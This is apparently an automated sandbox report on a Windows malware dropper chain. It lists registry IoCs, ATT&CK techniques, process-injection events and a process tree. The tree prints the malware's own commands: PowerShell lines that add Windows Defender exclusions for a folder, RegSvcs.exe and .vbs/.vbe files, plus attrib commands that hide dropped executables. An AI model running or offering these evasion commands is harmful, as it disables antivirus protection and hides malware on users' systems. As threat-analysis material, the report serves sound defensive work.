Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sbasnekg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	firefox.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Msbuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RtDrivers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	slsggeii.icm
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f7a9b0d3cf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	recover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1177e54c4b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XtDrivers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	564133c059.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	recover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	87ae08f5df.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	87ae08f5df.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2128	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4828	ipconfig.exe
948	ipconfig.exe
1584	ipconfig.exe
3248	ipconfig.exe

Modifies Internet Explorer Protected Mode 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3"	firefox.exe

Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1"	firefox.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Internet Explorer\Main\TabProcGrowth = "0"	firefox.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	Chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133870316658603764"	Chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-308834014-1004923324-1191300197-1000\{98AF0044-517A-4502-BFC1-5D618FD57D82}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings	XtDrivers.exe
Key created	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings	RtDrivers.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
6020	schtasks.exe
5896	schtasks.exe
6968	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
32	RegSvcs.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3500	1Q31F6.exe
3500	1Q31F6.exe
4820	rapes.exe
4820	rapes.exe
5008	2h9290.exe
5008	2h9290.exe
5008	2h9290.exe
5008	2h9290.exe
5008	2h9290.exe
5008	2h9290.exe
4440	3z97M.exe
4440	3z97M.exe
940	powershell.exe
940	powershell.exe
1168	cronikxqqq.exe
1168	cronikxqqq.exe
1168	cronikxqqq.exe
1168	cronikxqqq.exe
2976	powershell.exe
2428	TempW8VK0EB6ZLWNVWYGZNRA2XZTMPLZREHL.EXE
2428	TempW8VK0EB6ZLWNVWYGZNRA2XZTMPLZREHL.EXE
2976	powershell.exe
4200	powershell.exe
4200	powershell.exe
4972	powershell.exe
4972	powershell.exe
4128	powershell.exe
4128	powershell.exe
3772	MSBuild.exe
3772	MSBuild.exe
3772	MSBuild.exe
3772	MSBuild.exe
5016	MSBuild.exe
5016	MSBuild.exe
5016	MSBuild.exe
5016	MSBuild.exe
4196	483d2fa8a0d53818306efeb32d3.exe
4196	483d2fa8a0d53818306efeb32d3.exe
6004	MSBuild.exe
6004	MSBuild.exe
6004	MSBuild.exe
6004	MSBuild.exe
1728	VLPDrivers.exe
1728	VLPDrivers.exe
1728	VLPDrivers.exe
1728	VLPDrivers.exe
2104	MSBuild.exe
2104	MSBuild.exe
2104	MSBuild.exe
2104	MSBuild.exe
1728	VLPDrivers.exe
4668	c0355d9ef7.exe
4668	c0355d9ef7.exe
5604	sbasnekg.exe
5604	sbasnekg.exe
5604	sbasnekg.exe
5604	sbasnekg.exe
5604	sbasnekg.exe
5604	sbasnekg.exe
5604	sbasnekg.exe
5604	sbasnekg.exe
5604	sbasnekg.exe
5604	sbasnekg.exe
5604	sbasnekg.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
8028	putty.exe

Suspicious behavior: MapViewOfSection 12 IoCs

pid	Process
4200	RegSvcs.exe
4200	RegSvcs.exe
4200	RegSvcs.exe
4200	RegSvcs.exe
8024	laf6w_001.exe
8024	laf6w_001.exe
8024	laf6w_001.exe
7020	svchost.exe
7020	svchost.exe
4516	c80.exe
4516	c80.exe
4516	c80.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
5392	msedge.exe
5392	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3952	50KfF6O.exe
Token: SeDebugPrivilege	940	powershell.exe
Token: SeDebugPrivilege	1584	cronikxqqq.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	4200	powershell.exe
Token: SeDebugPrivilege	4972	powershell.exe
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	1728	VLPDrivers.exe
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	4216	powershell.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	3168	powershell.exe
Token: SeDebugPrivilege	4752	powershell.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	5624	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	2024	MSBuild.exe
Token: SeDebugPrivilege	2024	MSBuild.exe
Token: SeDebugPrivilege	2024	MSBuild.exe
Token: SeDebugPrivilege	5052	powershell.exe
Token: SeDebugPrivilege	3272	powershell.exe
Token: SeDebugPrivilege	32	RegSvcs.exe
Token: SeDebugPrivilege	3592	powershell.exe
Token: SeDebugPrivilege	6272	powershell.exe
Token: SeDebugPrivilege	6448	powershell.exe
Token: SeDebugPrivilege	6428	powershell.exe
Token: SeDebugPrivilege	6388	recover.exe
Token: SeDebugPrivilege	6608	powershell.exe
Token: SeDebugPrivilege	6524	powershell.exe
Token: SeDebugPrivilege	6616	powershell.exe
Token: SeDebugPrivilege	6584	powershell.exe
Token: SeDebugPrivilege	6788	powershell.exe
Token: SeShutdownPrivilege	6912	Chrome.exe
Token: SeCreatePagefilePrivilege	6912	Chrome.exe
Token: SeShutdownPrivilege	6912	Chrome.exe
Token: SeCreatePagefilePrivilege	6912	Chrome.exe
Token: SeShutdownPrivilege	6912	Chrome.exe
Token: SeCreatePagefilePrivilege	6912	Chrome.exe
Token: SeShutdownPrivilege	6912	Chrome.exe
Token: SeCreatePagefilePrivilege	6912	Chrome.exe
Token: SeShutdownPrivilege	6912	Chrome.exe
Token: SeCreatePagefilePrivilege	6912	Chrome.exe
Token: SeShutdownPrivilege	6912	Chrome.exe
Token: SeCreatePagefilePrivilege	6912	Chrome.exe
Token: SeShutdownPrivilege	6912	Chrome.exe
Token: SeCreatePagefilePrivilege	6912	Chrome.exe
Token: SeShutdownPrivilege	6912	Chrome.exe
Token: SeCreatePagefilePrivilege	6912	Chrome.exe
Token: SeShutdownPrivilege	6912	Chrome.exe
Token: SeCreatePagefilePrivilege	6912	Chrome.exe
Token: SeShutdownPrivilege	6912	Chrome.exe
Token: SeCreatePagefilePrivilege	6912	Chrome.exe
Token: SeIncreaseQuotaPrivilege	5052	powershell.exe
Token: SeSecurityPrivilege	5052	powershell.exe
Token: SeTakeOwnershipPrivilege	5052	powershell.exe
Token: SeLoadDriverPrivilege	5052	powershell.exe
Token: SeSystemProfilePrivilege	5052	powershell.exe
Token: SeSystemtimePrivilege	5052	powershell.exe
Token: SeProfSingleProcessPrivilege	5052	powershell.exe
Token: SeIncBasePriorityPrivilege	5052	powershell.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
3500	1Q31F6.exe
1064	amnew.exe
5356	1177e54c4b.exe
5356	1177e54c4b.exe
5356	1177e54c4b.exe
6912	Chrome.exe
6912	Chrome.exe
5392	msedge.exe
5392	msedge.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
5356	1177e54c4b.exe
5356	1177e54c4b.exe
5356	1177e54c4b.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1728	VLPDrivers.exe
676	JZimOyf.exe
4200	RegSvcs.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 180 wrote to memory of 5652	180	b3e08ca856378f58f3f07e7ffb0ac11ee1953dff2063d9aed0809101940eea83.exe	86
PID 180 wrote to memory of 5652	180	b3e08ca856378f58f3f07e7ffb0ac11ee1953dff2063d9aed0809101940eea83.exe	86
PID 180 wrote to memory of 5652	180	b3e08ca856378f58f3f07e7ffb0ac11ee1953dff2063d9aed0809101940eea83.exe	86
PID 5652 wrote to memory of 3500	5652	z1E22.exe	89
PID 5652 wrote to memory of 3500	5652	z1E22.exe	89
PID 5652 wrote to memory of 3500	5652	z1E22.exe	89
PID 3500 wrote to memory of 4820	3500	1Q31F6.exe	90
PID 3500 wrote to memory of 4820	3500	1Q31F6.exe	90
PID 3500 wrote to memory of 4820	3500	1Q31F6.exe	90
PID 5652 wrote to memory of 5008	5652	z1E22.exe	91
PID 5652 wrote to memory of 5008	5652	z1E22.exe	91
PID 5652 wrote to memory of 5008	5652	z1E22.exe	91
PID 180 wrote to memory of 4440	180	b3e08ca856378f58f3f07e7ffb0ac11ee1953dff2063d9aed0809101940eea83.exe	93
PID 180 wrote to memory of 4440	180	b3e08ca856378f58f3f07e7ffb0ac11ee1953dff2063d9aed0809101940eea83.exe	93
PID 180 wrote to memory of 4440	180	b3e08ca856378f58f3f07e7ffb0ac11ee1953dff2063d9aed0809101940eea83.exe	93
PID 4820 wrote to memory of 3952	4820	rapes.exe	94
PID 4820 wrote to memory of 3952	4820	rapes.exe	94
PID 3952 wrote to memory of 4312	3952	50KfF6O.exe	96
PID 3952 wrote to memory of 4312	3952	50KfF6O.exe	96
PID 4820 wrote to memory of 1064	4820	rapes.exe	97
PID 4820 wrote to memory of 1064	4820	rapes.exe	97
PID 4820 wrote to memory of 1064	4820	rapes.exe	97
PID 1064 wrote to memory of 3572	1064	amnew.exe	98
PID 1064 wrote to memory of 3572	1064	amnew.exe	98
PID 1064 wrote to memory of 3572	1064	amnew.exe	98
PID 4820 wrote to memory of 5356	4820	rapes.exe	99
PID 4820 wrote to memory of 5356	4820	rapes.exe	99
PID 4820 wrote to memory of 5356	4820	rapes.exe	99
PID 5356 wrote to memory of 4356	5356	1177e54c4b.exe	100
PID 5356 wrote to memory of 4356	5356	1177e54c4b.exe	100
PID 5356 wrote to memory of 4356	5356	1177e54c4b.exe	100
PID 5356 wrote to memory of 5944	5356	1177e54c4b.exe	101
PID 5356 wrote to memory of 5944	5356	1177e54c4b.exe	101
PID 5356 wrote to memory of 5944	5356	1177e54c4b.exe	101
PID 4356 wrote to memory of 6020	4356	cmd.exe	103
PID 4356 wrote to memory of 6020	4356	cmd.exe	103
PID 4356 wrote to memory of 6020	4356	cmd.exe	103
PID 5944 wrote to memory of 940	5944	mshta.exe	104
PID 5944 wrote to memory of 940	5944	mshta.exe	104
PID 5944 wrote to memory of 940	5944	mshta.exe	104
PID 3572 wrote to memory of 1584	3572	futors.exe	106
PID 3572 wrote to memory of 1584	3572	futors.exe	106
PID 3572 wrote to memory of 1584	3572	futors.exe	106
PID 1584 wrote to memory of 1168	1584	cronikxqqq.exe	107
PID 1584 wrote to memory of 1168	1584	cronikxqqq.exe	107
PID 1584 wrote to memory of 1168	1584	cronikxqqq.exe	107
PID 1584 wrote to memory of 1168	1584	cronikxqqq.exe	107
PID 1584 wrote to memory of 1168	1584	cronikxqqq.exe	107
PID 1584 wrote to memory of 1168	1584	cronikxqqq.exe	107
PID 1584 wrote to memory of 1168	1584	cronikxqqq.exe	107
PID 1584 wrote to memory of 1168	1584	cronikxqqq.exe	107
PID 1584 wrote to memory of 1168	1584	cronikxqqq.exe	107
PID 4820 wrote to memory of 3244	4820	rapes.exe	111
PID 4820 wrote to memory of 3244	4820	rapes.exe	111
PID 4820 wrote to memory of 3244	4820	rapes.exe	111
PID 3244 wrote to memory of 2128	3244	cmd.exe	113
PID 3244 wrote to memory of 2128	3244	cmd.exe	113
PID 3244 wrote to memory of 2128	3244	cmd.exe	113
PID 3244 wrote to memory of 840	3244	cmd.exe	115
PID 3244 wrote to memory of 840	3244	cmd.exe	115
PID 3244 wrote to memory of 840	3244	cmd.exe	115
PID 940 wrote to memory of 2428	940	powershell.exe	114
PID 940 wrote to memory of 2428	940	powershell.exe	114
PID 940 wrote to memory of 2428	940	powershell.exe	114

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4312	attrib.exe
8092	attrib.exe

C:\Users\Admin\AppData\Local\Temp\b3e08ca856378f58f3f07e7ffb0ac11ee1953dff2063d9aed0809101940eea83.exe
"C:\Users\Admin\AppData\Local\Temp\b3e08ca856378f58f3f07e7ffb0ac11ee1953dff2063d9aed0809101940eea83.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:180
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z1E22.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z1E22.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:5652
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Q31F6.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Q31F6.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:3500
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4820
    - - C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3952
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe
        6⤵
        Views/modifies file attributes
        
        PID:4312
    - - C:\Users\Admin\AppData\Local\Temp\10284930101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10284930101\amnew.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1064
      - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        6⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3572
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1168
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 960
        8⤵
        Program crash
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        7⤵
        Executes dropped EXE
        
        PID:812
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:4888
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex1212.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1212.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5236
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\10034150101\Build_today.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10034150101\Build_today.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\RtDrivers.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RtDrivers.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4336
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\tfnf.vbe"
        9⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3592
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /release
        10⤵
        
        PID:4652
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        11⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:3248
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c slsggeii.icm ofkueqhk.pdf
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:5248
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\slsggeii.icm
        
        slsggeii.icm ofkueqhk.pdf
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:5660
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0
        12⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RegSvcs.exe
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbs'
        12⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbs
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbe
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '*.vbs'
        12⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension *.vbs
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:6448
        
